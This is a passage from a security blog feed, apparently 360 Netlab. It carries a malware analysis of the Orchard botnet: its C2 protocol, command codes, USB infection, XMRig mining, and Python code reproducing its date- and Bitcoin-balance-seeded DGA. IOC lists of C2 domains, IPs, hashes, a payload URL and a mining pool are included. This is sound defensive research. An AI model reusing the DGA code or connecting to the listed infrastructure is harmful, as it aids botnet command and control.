01;&#x80C1;&#x4FE1;&#x606F;&#x3002;</p>
<h2 id>&#x8054;&#x7CFB;&#x6211;&#x4EEC;</h2>
<p>&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x53EF;&#x4EE5;&#x5728; <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com"><strong>twitter</strong></a> &#x6216;&#x8005;&#x901A;&#x8FC7;&#x90AE;&#x4EF6;<strong>netlab[at]360.cn</strong>&#x8054;&#x7CFB;&#x6211;&#x4EEC;&#x3002;</p>
<h2 id="ioc">IOC</h2>
<h3 id="md5">MD5</h3>
<table>
<thead>
<tr>
<th>Family Name</th>
<th>MD5</th>
</tr>
</thead>
<tbody>
<tr>
<td>Bat2Exe Downloader</td>
<td>424ed5bcaae063a7724c49cdd93138f5</td>
</tr>
<tr>
<td>VBS downloader</td>
<td>3f20e08daaf34b563227c797b4574743</td>
</tr>
<tr>
<td>Powershell downloader</td>
<td>c4c5167dec23b6dd2d565cd091a279e4</td>
</tr>
<tr>
<td>&#x672A;&#x77E5;.NET Downloader</td>
<td>9b70a337824bac612946da1432295e9c</td>
</tr>
</tbody>
</table>
<h3 id="c2url">C2 &amp;URL</h3>
<pre><code>agenttt.ac.ug
andres.ug
asdasgs.ug
asdsadasrdc.ug
beachwood.ug
boundertime.ru
check-time.ru
courtneyjones.ac.ug
danwisha.ac.ug
hopeforhealth.com.ph
hubvera.ac.ug
jonescourtney.ac.ug
leatherlites.ug
marksidfgs.ug
marnersstyler.ug
mistitis.ug
mofdold.ug
momomolastik.ug
nicoslag.ru
partaususd.ru
pdshcjvnv.ug
qd34g34ewdfsf23.ru
qwertasd.ru
qwertzx.ru
raphaellasia.com
rockphil.ac.ug
rockrock.ug
timebound.ug
timebounder.ru
timecheck.ug
timekeeper.ug
triathlethe.ug
underdohg.ac.ug
underdohg.ug
www.rockrock.ug
212.192.246.195
37.0.11.164:8080
80.66.75.123
89.34.27.167
91.243.44.142
185.215.113.89
62.204.41.69
45.143.201.4

https://cdn.discordapp.com/attachments/994652587494232125/1004377750762704896/ps1-6_Hjuvcier.png
</code></pre>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[A new botnet Orchard Generates DGA Domains with Bitcoin Transaction Information]]></title><description><![CDATA[<p>DGA is one of the classic techniques for botnets to hide their C2s, attacker only needs to selectively register a very small number of C2 domains, while for the defenders, it is difficult to determine in advance which domain names will be generated and registered.</p><p>360 netlab has long focused</p>]]></description><link>https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/</link><guid isPermaLink="false">63873b9a8b1c1e0007f5301e</guid><category><![CDATA[Botnet]]></category><category><![CDATA[DGA]]></category><category><![CDATA[Orchard]]></category><category><![CDATA[duckdns]]></category><category><![CDATA[xmrig]]></category><category><![CDATA[Bitcoin Genesis]]></category><category><![CDATA[Import 2022-11-30 11:16]]></category><category><![CDATA[en]]></category><dc:creator><![CDATA[daji]]></dc:creator><pubDate>Fri, 05 Aug 2022 14:00:00 GMT</pubDate><content:encoded><![CDATA[<p>DGA is one of the classic techniques for botnets to hide their C2s, attacker only needs to selectively register a very small number of C2 domains, while for the defenders, it is difficult to determine in advance which domain names will be generated and registered.</p><p>360 netlab has long focused on the research of botnet attack and defense technology, we maintain a free <a href="https://data.netlab.360.com/dga/?ref=blog.netlab.360.com">DGA feed</a> and share the research results with the industry. </p><p>Recently we discovered a new botnet that uses Satoshi Nakamoto&apos;s Bitcoin account transaction information to generate DGA domain name. Because of the uncertainty of Bitcoin transactions, this technique is more unpredictable than using the common time-generated DGAs, and thus more difficult to defend against.</p><p>The technique was discovered in a family of botnets we called Orchard. Since February 2021, this botnet has gone through 3 versions, and even switched programming languages in between.</p><p>Key points are as follow:</p>
<ul>
<li>Orchard is a botnet family that uses DGA technology with the core function of installing various malware on the victim&apos;s machine.</li>
<li>From February 2021 to the present, we have detected 3 versions of Orchard samples, all using the DGA technique.</li>
<li>Orchard&apos;s DGA algorithm has remained unchanged, but the use of dates has been changing, and the latest version also supports the use of bitcoin account information to generate separate DGA domains.</li>
<li>In addition to DGA, Orchard also hardcodes C2 domains.</li>
<li>Orchard is still active and dedicated to Monroe coin mining.</li>
</ul>
<h1 id="overview">Overview</h1><p>Orchard uses a redundant C2 mechanism of &quot;hardcoded domain + DGA&quot;, and each version hardcodes a unique DuckDNS dynamic domain name as C2.</p><pre><code>v1, orcharddns.duckdns.org
v2&#xFF0C;orchardmaster.duckdns.org
v3, ojena.duckdns.org
</code></pre><p>A timeline is as follow</p><pre><code>* 2021.3, v1, use C++. Combined with historical data, we found that the earliest appearance in January 2021
* 2021.9, v2, use Golang and C++
* 2022.7, v3, use C++
</code></pre><p>All three versions support propagation by infecting USB disks, much like traditional viruses, as described in the later section of &quot;USB Infection Logic&quot;. Theoretically, Orchard can be spread in other ways as well.</p><p>Using our graph system in combination with PDNS and other dimensional data, we found that there is a clear case of shared IPs between the C2 of v1 and v2, as shown in the figure below.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/08/-------.png" class="kg-image" alt loading="lazy" width="1240" height="935" srcset="https://blog.netlab.360.com/content/images/size/w600/2022/08/-------.png 600w, https://blog.netlab.360.com/content/images/size/w1000/2022/08/-------.png 1000w, https://blog.netlab.360.com/content/images/2022/08/-------.png 1240w" sizes="(min-width: 720px) 720px"></figure><p>The graph system helped us find more C2 IPs and domains, and the domains here are characterized by all ending in duckdns.org. v3 is relatively new and has fewer associated domains, and here is the active situation of v3 domains.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/08/v3----.png" class="kg-image" alt="v3----" loading="lazy"></figure><p>We can see that it was launched in May this year, and then gradually became active, and it should still be in the active period.</p><p>Based on our PDNS data, we evaluated the infection scale of the three versions, among which v1 and v2 have thousands of nodes, and v3 has less because of its late appearance, and the following is the detailed resolution number of each version of domain name to specific IP(note the numbers do not reflect all the bots as as our PDNS visibility focus mainly in China)</p><pre><code># v1, orcharddns.duckdns.org
37, 45.61.185.36
413,  45.61.186.52
1301,  45.61.187.240
207, 205.185.124.143

# v2, orchardmaster.duckdns.org
45,  45.61.185.36
104, 45.61.186.52
659,  45.61.187.240

# v3, ojena.duckdns.org
418, 45.61.185.231
</code></pre><h1 id="sample-analysis">Sample Analysis</h1><p>Loader is used for counter analysis and self-protection. Currently Orchard loader is not fixed, even a single version can have a variety of loaders, for example, v1 version of Orchard is  base64 encoded in the loader, v2/v3 version of the sample in the form of resource files stored in the loader in some cases. Each version has also used virtualization packers such as VMP, Enigma, etc. to protect itself. In general, Orchard&apos;s workflow can be summarized in the following diagram.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/08/------.png" class="kg-image" alt loading="lazy" width="1506" height="819" srcset="https://blog.netlab.360.com/content/images/size/w600/2022/08/------.png 600w, https://blog.netlab.360.com/content/images/size/w1000/2022/08/------.png 1000w, https://blog.netlab.360.com/content/images/2022/08/------.png 1506w" sizes="(min-width: 720px) 720px"></figure><p>The functions of all three versions of Orchard are basically the same and include:</p><ul>
<li>Uploading device and user information</li>
<li>Responding to commands/downloading to execute the next stage of the module</li>
<li>Infecting USB storage devices</li>
</ul>
<p>The core functions of each of the 3 versions of Orchard are analyzed below in several dimensions, such as DGA algorithm, C2 communication and host behavior.</p><h2 id="v1-version">v1 version</h2><p>The analysis of this version is based on the sample with MD5=5c883ff8539b8d04be017a51a84e3af8. It first releases the embedded PE file to the self-boot directory at runtime, and the released PE is base64 decoded in memory to get the orchard data, and then the PE uses any exe under System32/SysWOW64 as a puppet process to run the saved orchard code. The overall logic of this version of Orchard is as follows, mainly divided into two parts: network communication and USB infection, the final function depends on the specific module issued by C2, so orchard itself can be considered as a Downloader.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/08/v1-----2.png" class="kg-image" alt loading="lazy" width="1442" height="913" srcset="https://blog.netlab.360.com/content/images/size/w600/2022/08/v1-----2.png 600w, https://blog.netlab.360.com/content/images/size/w1000/2022/08/v1-----2.png 1000w, https://blog.netlab.360.com/content/images/2022/08/v1-----2.png 1442w" sizes="(min-width: 720px) 720px"></figure><p>Here we mainly describe its network communication process (the logic of USB infection is the same for all three versions, see the section on USB infection for details).</p><p>C2 communication process is relatively simple, the bot in the check-in process will contact C2 to send the collected host information, and then wait for C2 response. The response data format is generally &quot;command + data&quot;, the function of the command is specified by the command code.</p><p>The information collected by v1 version includes: volume serial number (HWID), computer name, user name, operating system name, system version, installed capture driver name, antivirus information, parent process file modification time, top window name and window title, etc. These information are separated by &quot;[o.r.c.h.a.r.d]&quot;. &quot; as a separator and then sent as shown in the following figure.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/08/v1.C-------4.png" class="kg-image" alt="v1.C-------4" loading="lazy"></figure><p>The example of C2 response data is as follows, where &quot;[&amp;&amp;]&quot; stands for instruction code 2, which represents downloading and execution, and the specific processing is divided into 2 types: if the response data is a URL, the PE corresponding to the URL is downloaded and executed; if it is a base64 encoded content, the decoded data is decoded first and then executed. The response data here is actually the new version of base64-encoded PE file, which is equivalent to upgrade, which also indicates that the old version may have been deprecated.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/08/v1.C-------5.png" class="kg-image" alt="v1.C-------5" loading="lazy"></figure><p>The v1 version defines a total of 8 instructions, and the correspondence between the instruction code and the instruction string is as follows.</p><pre><code>1 \[=] 
2 \[&amp;&amp;] 
3 \[##] 
4 \[###] 
5 \[%%] 
6 \[%%%] 
7 \[#\_#] 
8 \[\_\_\] \[&gt;&gt;] \[&lt;&lt;] \[^^] \[\*\] \[\~\] \[@] \[!] \[#\*\#\] \[#@#] 
</code></pre><p>Due to the nulling of some instructions, the eight instructions actually correspond to three operations (subsequent versions are similar).</p><ul>
<li>Instruction code 1 and 2: determine whether the response data is URL or PE, if it is URL, then download and execute, if it is PE, then create a process to execute (CreateProcess to create a process, puppet process, remote thread injection, etc.).</li>
<li>Instruction code 3, 4, 8: terminate the current process to delete the original file, or restart.</li>
<li>Instruction code 7: collect C2, port, PID, file name information again to send to C2, example: orcharddns.duckdns.org[o.r.c.h.a.r.d]5890[o.r.c.h.a.r.d]2260[o.r.c.h.a.r.d]stage-3_.exe[o.r.c .h.a.r.d]</li>
</ul>
<h3 id="dga-algorithm">DGA Algorithm</h3><p>v1&apos;s DGA takes the date string (e.g. &quot;2022/07/05&quot;) as input, calculates its MD5 value, then divides the MD5 string into four 8-byte substrings, and splices them with the 4 suffixes of .com, .net, .org, .duckdns.org in turn to get the daily 4 groups of 16 DGA domain names, the algorithm is implemented as follows.</p><pre><code># 2021/04/15
import datetime
import hashlib

days=30
for i in range(0, days):
    datex = (datetime.datetime.now() - datetime.timedelta(days=i)).strftime(&apos;%Y/%m/%d&apos;)
    print(&quot;seed: &quot;, datex)
    md5 = hashlib.md5(datex.encode()).hexdigest()
    print(&apos;md5: &apos;, md5)

    dga_list = []
    dga_list.append(md5[:8])
    dga_list.append(md5[8:16])
    dga_list.append(md5[16:24])
    dga_list.append(md5[24:32])
    for j in range(len(dga_list)):
        print(dga_list[j] + &apos;.com&apos;)
        print(dga_list[j] + &apos;.net&apos;)
        print(dga_list[j] + &apos;.org&apos;)
        print(dga_list[j] + &apos;.duckdns.org&apos;)
</code></pre><p>Sample domains are as follow:</p><pre><code>seed:  2022/07/05
md5:  91ac64d29f78281ad802f44648b2137f
91ac64d2.com
91ac64d2.net
91ac64d2.org
91ac64d2.duckdns.org
9f78281a.com
9f78281a.net
9f78281a.org
9f78281a.duckdns.org
d802f446.com
d802f446.net
d802f446.org
d802f446.duckdns.org
48b2137f.com
48b2137f.net
48b2137f.org
48b2137f.duckdns.org
</code></pre><h2 id="v2-version">v2 version</h2><p>The v2 version appears as a sample of two programming language implementations, Golang and C++, but with the same functionality. The analysis here takes the Golang sample with MD5=f3e0b960a48b433bc4bfe6ac44183b74 as an example, and its C2 initialization function is shown below, which can obviously see the hard-coded C2 domain names.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/09/3.png" class="kg-image" alt loading="lazy" width="2000" height="1266" srcset="https://blog.netlab.360.com/content/images/size/w600/2021/09/3.png 600w, https://blog.netlab.360.com/content/images/size/w1000/2021/09/3.png 1000w, https://blog.netlab.360.com/content/images/size/w1600/2021/09/3.png 1600w, https://blog.netlab.360.com/content/images/2021/09/3.png 2287w" sizes="(min-width: 720px) 720px"></figure><p>The v2 version of C2 communication starts to use json format, and the meaning of the fields is relatively clear. It collects roughly the same information as v1, including: volume serial number (HWID), computer name, user name, system version, antivirus information, active window information, etc. The new fields are: .net framework version (e.g. v2.0.50727), USB status, outgoing package type and its own version. The following is an actual observed version number information, Bot_Version=1.2/G may be interpreted as: version=v1.2, writing language=Golang.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/08/v2.golang-----1.png" class="kg-image" alt="v2.golang-----1" loading="lazy"></figure><p>The v2 version of the C++ language sample integrates the same C2, and the version information in the live package becomes &quot;Bot_version:1/C&quot;, which collects the information shown in the figure below.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/08/v2.C-------1.png" class="kg-image" alt="v2.C-------1" loading="lazy"></figure><p>According to the code similarity analysis, the v2 C++ language sample is homologous with the later v3 C++ sample, which means that the latter is evolved from the former.</p><p>The v2 version has a total of two kinds of instructions.</p><ul>
<li>Instruction 1: terminate the current process to delete the original file, or restart it.</li>
<li>Instruction 2: Determine whether the response data is URL or PE, if it is URL, then download and execute, if it is PE, then create process and execute (CreateProcess create process, puppet process, remote thread injection, etc.).</li>
</ul>
<h4 id="dga-algorithm">DGA Algorithm</h4>
<p>v2 version of DGA algorithm is the same as v1, the difference lies in the processing of the date string. v2 will splice the hard-coded domain name &quot;orchardmaster.duckdns.org&quot; after the date string, such as &quot;2022/07/ 05orchardmaster.duckdns.org&quot;, and then apply the DGA algorithm of v1 to generate the domain name.</p>
<h3 id="v3-version">v3 version</h3>
<p>The development language of v3 is back to C++, which also includes C2 communication and USB infection functions. C2 communication logic runs in a thread, which also includes a secondary thread tied to XMRig mining, and when Orchard has received the XMrig program and created a puppet process to run, the secondary thread will send mining-related hardware information to C2 again. The purpose of trying to read the configuration of the mining software from C2 is to check if the XMRig runtime configuration needs to be dynamically modified (XMRig provides a set of HTTP api that supports dynamically reading and modifying the runtime mining configuration).<br>
Taking the sample with MD5=cb442cbff066dfef2e3ff0c56610148f as an example, the C2 communication function is as follows.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/07/v3-1.png" class="kg-image" alt="v3-1" loading="lazy"></figure><p>The v3 version also uses json format to save host information in C2 communication, and the overall structure of the sent data is Byte_0x46+TotalLen+InfoLen+Info.json. Compared to v2, v3 adds several fields related to mining, and the collected information includes:</p><ul>
<li>Active_Window: the name of the currently active window</li>
<li>Antivirus: antivirus information</li>
<li>Authentiate_Type: Windows authentication type</li>
<li>CPU_Model: CPU information</li>
<li>Camera: whether a camera is present</li>
<li>Elevated: whether it is administrator privileges</li>
<li>GPU_Models: graphics card information</li>
<li>Identity&#xFF1A;HWID\username\computer name</li>
<li>Operating_System: System version information</li>
<li>Ram_Size&#xFF1A;Running memory size</li>
<li>System_Architecture&#xFF1A;Number of processors</li>
<li>Threads&#xFF1A;Number of cores per processor</li>
<li>Version&#xFF1A;Orchard version</li>
</ul>
<p>An example of a live package for v3 is shown below.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/08/v3.c-------1-1.png" class="kg-image" alt="v3.c-------1-1" loading="lazy"></figure><p>The body part of C2 response message is also in json format, and its structure is:<br>
<code>TotalLen.dword+ Byte0x46+TotalLen+RespDataLen+RespData.json</code>.<br>
v3 supports 8 instructions, corresponding to 3 operations.</p>
<ul>
<li>Instruction 1: Collect host information/its own running status and send it to C2 (fields include Domain, In_Memory, Install_Path, Is_Patched, Message_Type, Patch_Name, Port, Power_SaverMode, Process_ID. (Process_Name, Process_Path, System_Idle, System_Uptime)</li>
<li>Instruction 4, 6: terminate the current process to delete the original file, or restart.</li>
<li>Instruction 7, 8: download &amp; execute the miner program sent down</li>
</ul>
<p>The following is an actual trace of the C2 response instruction.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/08/v33-3.png" class="kg-image" alt="v33-3" loading="lazy"></figure><p>Where Transfer_Port indicates that the host is expected to make another request to 2929, and Message_Type indicates the instruction code, whose value is 7, indicating download &amp; execute.</p><p>After receiving the above instruction, bot makes another request to C2&apos;s TCP port 2929. Cuda is a parallel computing framework introduced by Nvidia that can only be used for its own GPU, and a Cuda_Version of 0 here means that Cuda is not supported.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/08/v31-5.png" class="kg-image" alt="v31-5" loading="lazy"></figure><p>C2 then responds with an XMRig miner program, which Client receives and saves and then injects XMRig into the puppet process according to instruction 7 to start performing mining work.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/08/v34-1-1.png" class="kg-image" alt="v34-1-1" loading="lazy"></figure><p>During the analysis we found that the v3 version has recently been continuously distributing an identical XMRig mining program, the latter integrated with the default mining configuration information, private mining pool address: 45.61.187.7:7733</p><h4 id="dga-algorithm">DGA Algorithm</h4>
<p>The DGA algorithm of v3 is unchanged, but the input is more variable. It actually generates two sets of DGA domains, the first set of domains is entered with a spelling algorithm of date string + &quot;ojena.duckdns.org&quot;, shaped like &quot;2022-08-02ojena.duckdns.org &quot;. The second set of domain names is entered as the return result of the URL <code>https://blockchain.info/balance?active=1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa</code>.  A typical return result is shown below.</p>
<pre><code>{&quot;1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa&quot;:&quot;final_balance&quot;:6854884253,&quot;n_tx&quot;:3393,&quot;total_received&quot;:6854884253}}
</code></pre>
<p>The meaning of the relevant fields can be found in <a href="https://zh.m.wikipedia.org/zh-hans/Blockchain.com?ref=blog.netlab.360.com">Blockchain</a>&apos;s <a href="http://cw.hubwiz.com/card/c/blockchain-api/1/3/9/?ref=blog.netlab.360.com">API manual</a></p><p>It is worth emphasizing that the v3 version does not parse the returned results, but directly  feed  it into the DGA algorithm as a whole to generate the domain name. Instead, the wallet address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa is said to be the Bitcoin Genesis address held by Satoshi Nakamoto himself. Over the past decade or so, small amounts of bitcoin have been transferred to this wallet on a daily basis for various reasons, so it is variable and that change is difficult to predict, so the balance information for this wallet can also be used as DGA input.</p><p>At the time of writing, we found that other researchers had recently noticed this use of bitcoin account transaction information as DGA input for v3. The results of their analysis agreed with ours, but they did not notice that Orchard had actually been around for a long time.</p><p>The complete v3 DGA algorithm is as follows.</p><pre><code># 2022/07/05
import datetime
import requests
import hashlib

# cluster 1
days = 30
for i in range(0, days):
    domains = [&apos;ojena.duckdns.org&apos;, &apos;vgzero.duckdns.org&apos;]
    for do in domains:
        datex = (datetime.datetime.now() - datetime.timedelta(days=i)).strftime(&apos;%Y-%m-%d&apos; + do)
        print(&quot;seed_1: %s&quot; % datex)
        md5 = hashlib.md5(datex.encode()).hexdigest()
        print(&quot;md5: %s&quot; % md5)
        
        dga_list = []
        dga_list.append(md5[:8])
        dga_list.append(md5[8:16])
        dga_list.append(md5[16:24])
        dga_list.append(md5[24:32])
        for j in range(len(dga_list)):
            print(dga_list[j] + &apos;.com&apos;)
            print(dga_list[j] + &apos;.net&apos;)
            print(dga_list[j] + &apos;.org&apos;)
            print(dga_list[j] + &apos;.duckdns.org&apos;)


# cluster 2
url = &apos;https://blockchain.info/balance?active=1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa&apos; 
res = requests.get(url)
wallet_info = res.text
print(&apos;seed_2: %s&apos; % wallet_info)
md5 = hashlib.md5(wallet_info.encode()).hexdigest()
print(&apos;md5: %s&apos; % md5)

dga_list = []
dga_list.append(md5[:8])
dga_list.append(md5[8:16])
dga_list.append(md5[16:24])
dga_list.append(md5[24:32])
for j in range(len(dga_list)):
    print(dga_list[j] + &apos;.com&apos;)
    print(dga_list[j] + &apos;.net&apos;)
    print(dga_list[j] + &apos;.org&apos;)
    print(dga_list[j] + &apos;.duckdns.org&apos;)

</code></pre><h2 id="usb-infection">USB Infection</h2><p>Orchard&apos;s file infection is not a traditional code insertion, but a file replacement. When a USB storage device is detected, Orchard will create a hidden directory under the root directory of the device, traverse all files for infection, and back up the files before and after infection to this hidden directory, the infected object is infected with the type attribute removed, and after infection all become exe type, and append the .exe suffix to become an executable file. Then the sample will copy itself to the infected directory and randomly named, the string is saved to the resources of the infected file. When the infected file in the device is executed by the user in the new system, it will launch the sample file in the hidden directory to achieve the purpose of spreading the infection.</p><p>The USB infection process involves two embedded PE files, the first one is a DLL file that will be released to the %LocalAppData% directory, this DLL is called CGO_Helper by Orchard and is mainly used to extract and replace the icon of the infected file, its MD5 is The second file is an exe file with MD5 of f3c06399c68c5fdf80bb2853f8f2934b, which is used as a template file to store the infected code, and all the data of the infected file will be replaced with the data of this template file. The function of this template is to find the corresponding exe in the hidden directory to start execution according to the exe name in the resource, so the resource of the infected file is saved with the name of the backup Orchard sample.</p><p>USB infection case example is as follows, the name of Orchard sample is saved in the resource of the infected file, when the user clicks on the infected exe, it will start the Orchard sample file in the hidden directory.</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com:8443/content/images/2022/07/-----4.png" class="kg-image" alt="-----4" loading="lazy"></figure><h1 id="summary">Summary</h1><p>Orchard is a botnet family that uses DGA technology. The latest version is dedicated to mining and has started using more unpredictable information like transaction information of bitcoin accounts as input to DGA, making detection more difficult. In over 1 year, Orchard has appeared in 3 different versions with changes in programming language and DGA implementation, indicating that Orchard is a botnet family that is still active and deserves our vigilance. We expect more variants to emerge subsequently, for which we will continue to keep an eye on, and will continue to disclose new findings.</p><h1 id="contact-us">Contact us</h1>
<p>Readers are always welcomed to reach us on <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com"><strong>twitter</strong></a>  or email us to <strong>netlab[at]360.cn</strong>.</p>
<h2 id="iocs">IOCs</h2><h3 id="c2">C2</h3><pre><code>orcharddns.duckdns.org
orchardmaster.duckdns.org
ojena.duckdns.org
vgzero.duckdns.org
victorynicholas.duckdns.org
zamarin1.duckdns.org

45.61.185.36
45.61.186.52
45.61.187.240
205.185.124.143
45.61.185.231
</code></pre><h3 id="md5">MD5</h3><pre><code>5c883ff8539b8d04be017a51a84e3af8
f3e0b960a48b433bc4bfe6ac44183b74
9cbe4bd27eba8c70b6eddaeb6707659b
cb442cbff066dfef2e3ff0c56610148f
10D42F5465D5D8808B43619D8266BD99
f3c06399c68c5fdf80bb2853f8f2934b
19159280736dbe6c11b7d6a57f6bb7b9
b5a6f78d5575a60316f4e784371d4f8c
3c20ba851edecd28c198691321429883
2b244a39571ab27f7bb4174d460adeef
ae1e9b3621ee041be6ab5e12bff37c53
00b1620f89b7980b34d53737d9e42fd3
4d2445a43591d041cabbbf3dfca6dfbd
</code></pre><h3 id="private-mining-pool">Private mining pool</h3><pre><code>45.61.187.7:7733
</code></pre><h2 id="contact-us"><strong>Contact us</strong></h2><p>Readers are always welcomed to reach us on <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com">Twitter</a> or email us to netlab[at]360.cn.</p>]]></content:encoded></item><item><title><![CDATA[DGA家族Orchard持续变化，新版本用比特币交易信息生成DGA域名]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>DGA&#x662F;&#x4E00;&#x79CD;&#x7ECF;&#x5178;&#x7684;botnet&#x5BF9;&#x6297;&#x68C0;&#x6D4B;&#x7684;&#x6280;&#x672F;&#xFF0C;&#x5176;&#x539F;&#x7406;&#x662F;&#x4F7F;&#x7528;&#x67D0;&#x79CD;DGA&#x7B97;&#x6CD5;&#xFF0C;&#x7ED3;&#x5408;&#x7279;&#x5B9A;&#x7684;&#x79CD;&#x5B50;&#x548C;&#x5F53;&#x524D;&#x65E5;&#x671F;&#xFF0C;&#x5B9A;&#x671F;&#x751F;&#x6210;&#x5927;&#x91CF;&#x7684;&#x57DF;&#x540D;</p>]]></description><link>https://blog.netlab.360.com/orchard-dga/</link><guid isPermaLink="false">63873b9a8b1c1e0007f52fe1</guid><category><![CDATA[Botnet]]></category><category><![CDATA[DGA]]></category><category><![CDATA[xmrig]]></category><category><![CDATA[duckdns]]></category><category><![CDATA[比特币]]></category><category><![CDATA[挖矿]]></category><category><![CDATA[ordhard]]></category><category><![CDATA[Import 2022-11-30 11:16]]></category><dc:creator><![CDATA[daji]]></dc:creator><pubDate>Fri, 05 Aug 2022 03:31:07 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>DGA&#x662F;&#x4E00;&#x79CD;&#x7ECF;&#x5178;&#x7684;botnet&#x5BF9;&#x6297;&#x68C0;&#x6D4B;&#x7684;&#x6280;&#x672F;&#xFF0C;&#x5176;&#x539F;&#x7406;&#x662F;&#x4F7F;&#x7528;&#x67D0;&#x79CD;DGA&#x7B97;&#x6CD5;&#xFF0C;&#x7ED3;&#x5408;&#x7279;&#x5B9A;&#x7684;&#x79CD;&#x5B50;&#x548C;&#x5F53;&#x524D;&#x65E5;&#x671F;&#xFF0C;&#x5B9A;&#x671F;&#x751F;&#x6210;&#x5927;&#x91CF;&#x7684;&#x57DF;&#x540D;&#xFF0C;&#x800C;&#x653B;&#x51FB;&#x8005;&#x53EA;&#x662F;&#x9009;&#x62E9;&#x6027;&#x7684;&#x6CE8;&#x518C;&#x5176;&#x4E2D;&#x7684;&#x6781;&#x5C11;&#x6570;&#x3002;&#x5BF9;&#x4E8E;&#x9632;&#x5FA1;&#x8005;&#x800C;&#x8A00;&#xFF0C;&#x56E0;&#x4E3A;&#x96BE;&#x4EE5;&#x4E8B;&#x5148;&#x786E;&#x5B9A;&#x54EA;&#x4E9B;&#x57DF;&#x540D;&#x4F1A;&#x88AB;&#x751F;&#x6210;&#x548C;&#x6CE8;&#x518C;&#xFF0C;&#x56E0;&#x800C;&#x9632;&#x5FA1;&#x96BE;&#x5EA6;&#x6781;&#x5927;&#x3002;</p>
<p>360 netlab&#x957F;&#x671F;&#x4E13;&#x6CE8;&#x4E8E;botnet&#x653B;&#x9632;&#x6280;&#x672F;&#x7684;&#x7814;&#x7A76;&#xFF0C;&#x7EF4;&#x62A4;&#x4E86;&#x4E13;&#x95E8;&#x7684;<a href="https://data.netlab.360.com/dga/?ref=blog.netlab.360.com">DGA&#x7B97;&#x6CD5;&#x548C;&#x60C5;&#x62A5;&#x5E93;</a>&#xFF0C;&#x5E76;&#x901A;&#x8FC7;&#x8BA2;&#x9605;&#x60C5;&#x62A5;&#x7684;&#x65B9;&#x5F0F;&#x4E0E;&#x4E1A;&#x754C;&#x5206;&#x4EAB;&#x7814;&#x7A76;&#x6210;&#x679C;&#x3002;&#x8FD1;&#x671F;&#x6211;&#x4EEC;&#x5728;&#x5206;&#x6790;&#x672A;&#x77E5;DGA&#x57DF;&#x540D;&#x65F6;&#x53D1;&#x73B0;&#x4E00;&#x4F8B;&#x4E0D;&#x4F46;&#x4F7F;&#x7528;&#x65E5;&#x671F;&#xFF0C;&#x8FD8;&#x4F1A;&#x540C;&#x65F6;&#x4F7F;&#x7528;&#x4E2D;&#x672C;&#x806A;&#x7684;&#x6BD4;&#x7279;&#x5E01;&#x8D26;&#x53F7;&#x4EA4;&#x6613;&#x4FE1;&#x606F;&#x6765;&#x751F;&#x6210;DGA&#x57DF;&#x540D;&#x7684;&#x4F8B;&#x5B50;&#x3002;&#x56E0;&#x4E3A;&#x6BD4;&#x7279;&#x5E01;&#x4EA4;&#x6613;&#x7684;&#x4E0D;&#x786E;&#x5B9A;&#x6027;&#xFF0C;&#x8BE5;&#x6280;&#x672F;&#x6BD4;&#x4F7F;&#x7528;&#x65F6;&#x95F4;&#x751F;&#x6210;&#x7684;DGA&#x66F4;&#x96BE;&#x9884;&#x6D4B;&#xFF0C;&#x56E0;&#x800C;&#x9632;&#x5FA1;&#x96BE;&#x5EA6;&#x66F4;&#x5927;&#x3002;</p>
